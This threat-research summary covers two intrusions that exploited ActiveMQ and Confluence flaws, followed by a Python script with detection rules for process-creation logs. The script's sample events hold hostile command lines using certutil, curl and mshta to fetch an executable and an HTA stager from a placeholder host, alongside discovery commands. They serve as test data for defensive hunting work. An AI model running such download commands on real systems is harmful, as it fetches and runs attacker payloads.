Threat Research

    The intrusion started in mid-February 2024 when a threat actor exploited CVE-2023-46604 on an exposed Apache ActiveMQ server. By leveraging a Java Spring class and a custom Spring bean XML configuration, the attacker achieved remote code execution. The malicious XML executed a command that used Windows CertUtil to download a payload from a remote server....
    The attack began with the exploitation of CVE-2023-22527, a critical RCE vulnerability in Confluence, on a Windows server. Initial signs of activity included system discovery commands like net user and whoami. The attacker attempted to download AnyDesk via curl, failing at first but later retrieving it using mshta and a remote HTA file containing a Metasploit stager....
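Both intrusions summarized above share the same early pattern: a command shell spawned by the exploited Java service, basic discovery (net user, whoami), and a built-in Windows binary (CertUtil, mshta, curl) used to pull the next stage from a remote host. The Python below is an added example, not code from either write-up or from any tool named in them; it runs a few hunting rules over a constructed sample of process-creation events and raises the severity of a hit when the parent is the exposed service. The event layout, the address 203.0.113.10, the file names and the SERVICE_PARENTS list are assumptions made for illustration, not values taken from the reports.

```python
import re
from dataclasses import dataclass

# Assumed parent-process names for the exploited services (ActiveMQ and Confluence
# both run inside a JVM). These are assumptions about how the service appears in
# process telemetry, not values from the write-ups.
SERVICE_PARENTS = {"java.exe", "tomcat9.exe", "tomcat9w.exe"}

# Hunting rules: (name, base severity, regex over the full command line).
RULES = [
    # CertUtil fetching a remote resource (-urlcache with an http(s) or UNC source).
    ("certutil_download", "medium",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*(?:https?://|\\\\)", re.I)),
    # mshta launched against a remote HTA.
    ("mshta_remote", "medium",
     re.compile(r"\bmshta(?:\.exe)?\b.*(?:https?://|\\\\)", re.I)),
    # curl pulling a file from a URL.
    ("curl_download", "medium",
     re.compile(r"\bcurl(?:\.exe)?\b.*https?://", re.I)),
    # Host/account discovery commands seen at the start of both intrusions.
    ("discovery", "low",
     re.compile(r"(?:^|[\s/&|])(?:whoami|net\d?\s+(?:user|group|localgroup))(?:\s|$)", re.I)),
]

# A hit under a service parent is one step more severe than the rule's base level.
ESCALATE = {"low": "medium", "medium": "high", "high": "high"}

# Constructed sample of process-creation events (Sysmon event 1 / 4688 style),
# reduced to parent image, image and command line. Not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "java.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/update.exe C:\Windows\Temp\update.exe"},
    {"parent": "tomcat9.exe", "image": "cmd.exe", "cmdline": r"cmd.exe /c whoami"},
    {"parent": "tomcat9.exe", "image": "cmd.exe", "cmdline": r"cmd.exe /c net user"},
    {"parent": "tomcat9.exe", "image": "curl.exe",
     "cmdline": r"curl -o C:\Users\Public\AnyDesk.exe http://203.0.113.10/AnyDesk.exe"},
    {"parent": "tomcat9.exe", "image": "mshta.exe", "cmdline": r"mshta http://203.0.113.10/stager.hta"},
    # Benign: certutil used for its intended purpose, no -urlcache.
    {"parent": "explorer.exe", "image": "certutil.exe", "cmdline": r"certutil -verify C:\certs\server.cer"},
    # Discovery from a non-service parent stays at base severity.
    {"parent": "svchost.exe", "image": "whoami.exe", "cmdline": r"whoami"},
]


@dataclass(frozen=True)
class Finding:
    index: int      # position of the event in the input list
    rule: str
    severity: str
    image: str
    parent: str


def evaluate(events):
    """Run every rule over every event; return findings in event order."""
    findings = []
    for i, ev in enumerate(events):
        for name, base, rx in RULES:
            if rx.search(ev["cmdline"]):
                under_service = ev["parent"].lower() in SERVICE_PARENTS
                sev = ESCALATE[base] if under_service else base
                findings.append(Finding(i, name, sev, ev["image"], ev["parent"]))
    return findings


def count_by_severity(findings):
    """Summary used for triage: how many hits at each level."""
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] event {f.index}: {f.rule} ({f.parent} -> {f.image})")
    print(count_by_severity(evaluate(SAMPLE_EVENTS)))
```

The parent-process escalation is the part worth keeping when adapting this to real telemetry: a bare `whoami` is everywhere, but `whoami` or a CertUtil download whose parent is the JVM behind an internet-facing ActiveMQ or Confluence instance is the signal both reports describe, and it is cheap to alert on before the remote-access tool is in place.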